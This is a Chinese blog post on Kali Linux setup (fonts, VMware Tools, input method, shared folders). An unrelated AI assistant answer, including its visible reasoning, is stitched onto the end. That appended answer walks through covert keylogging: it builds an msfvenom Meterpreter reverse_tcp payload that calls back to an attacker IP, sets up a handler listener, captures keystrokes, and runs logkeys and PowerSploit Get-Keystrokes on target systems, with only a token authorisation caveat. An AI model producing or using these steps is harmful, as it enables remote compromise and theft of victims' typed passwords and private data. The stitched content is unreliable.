kali使用记录

本文介绍了如何解决KaLi Linux中的字体显示问题、安装VMware Tools、配置中文输入法及设置虚拟机共享文件夹的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.滚动更新后所有的字体都显示的空白方块

解决新版KaLi字体叠加错位
因为新版KaLi没有集成一些中国常用的字体,所以需要加入到KaLi才能正常显示。可选择直接安装字体和KaLi的字体替换 apt-get install ttf-wqy-microhei ttf-wqy-zenhei xfonts-wqy

 

2.安装VMware Tools

修改/etc/apt/source.list文件 添加源deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

执行命令:

apt-get update

apt-get dist-upgrade

reboot

apt-get update

apt-get install open-vm-tools-desktop fuse

reboot

 

3.中文输入法安装

谷歌拼音 apt-get install fcitx-googlepinyin 

reboot

 

4.设置vm虚拟机共享文件夹

首先在VM中设置共享文件如图:

然后在kali中建立链接 输入命令

/usr/bin/vmhgfs-fuse .host:/Desktop /mnt/hgfs -o subtype=vmhgfs-fuse,allow_other

其中Desktop就是虚拟机共享文件夹的名称 这样共享文件夹就建立 /mnt/hgfs便是共享文件夹了

 

 

 

 

 

 

<think>好的,我现在需要帮用户解决在Kali Linux中设置和获取键盘记录的问题。首先,我得回忆一下用户提供的引用内容,看看有没有相关的信息。引用[2]提到在Meterpreter中使用Explore/Log Keystrokes菜单来记录键盘动作,这可能是一个方法。引用[4]里提到了Get-Keystrokes模块,这应该属于PowerSploit或类似的工具。 Kali Linux常用的键盘记录方法可能有几种:使用Metasploit的Meterpreter模块,或者专门的工具如logkeys,或者通过社会工程学工具包。用户可能需要具体的步骤,所以得一步步说明。 首先,Metasploit的方法。用户需要生成一个Payload,然后设置监听。启动msfconsole,搜索相关的模块,比如exploit/multi/handler,设置Payload为windows/meterpreter/reverse_tcp,然后设置LHOST和LPORT。执行exploit后,一旦目标机运行Payload,就能获得Meterpreter会话。然后使用keyscan_start开始记录,keyscan_dump查看记录,最后keyscan_stop停止。这部分在引用[2]和[4]中有提到。 另外,logkeys是一个Linux下的键盘记录工具,安装可能用apt-get,然后配置启动。不过需要注意权限问题,可能需要root权限。 社会工程学工具包(SET)可能也有键盘记录功能,用户可以通过钓鱼攻击诱使目标执行恶意脚本,进而记录键盘输入。这可能涉及到创建恶意文件或网站,然后诱导用户点击。 还要考虑法律和道德问题,用户是否有合法授权进行这些操作。另外,防病毒软件可能会检测到这些工具,所以可能需要免杀处理。 用户可能需要具体的命令示例,比如如何生成Payload,如何配置msfconsole,以及如何启动logkeys服务。同时,引用[3]提到设置LHOST,这在Metasploit中是必须的步骤,需要确保IP正确。 总结步骤:Metasploit的Meterpreter方法、logkeys工具、SET工具包。每个方法的具体操作流程,命令示例,以及注意事项。最后提醒合法使用,引用相关的内容支持步骤的正确性。</think>在Kali Linux中实现键盘记录主要有以下方法,需注意操作需在合法授权范围内进行: ### 一、使用Metasploit的Meterpreter模块 1. **生成Payload** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.101 LPORT=4444 -f exe > payload.exe ``` 需替换`LHOST`为Kali的IP(如引用[3]的设置)[^3] 2. **启动监听** ```bash msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.200.101 set LPORT 4444 exploit ``` 3. **键盘记录操作** 获取会话后执行: ```bash keyscan_start # 开始记录 keyscan_dump # 查看记录内容 keyscan_stop # 停止记录 ``` 对应引用[2]中提到的Log Keystrokes功能[^2] ### 二、使用logkeys工具 1. 安装与配置: ```bash sudo apt install logkeys sudo logkeys --start --output /var/log/keylog.log ``` 2. 查看记录: ```bash tail -f /var/log/keylog.log ``` ### 三、通过PowerSploit模块 如引用[4]所述,可结合Mimikatz模块: ```powershell Get-Keystrokes -LogPath C:\key.log ``` 需通过渗透手段在目标系统执行该命令[^4]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值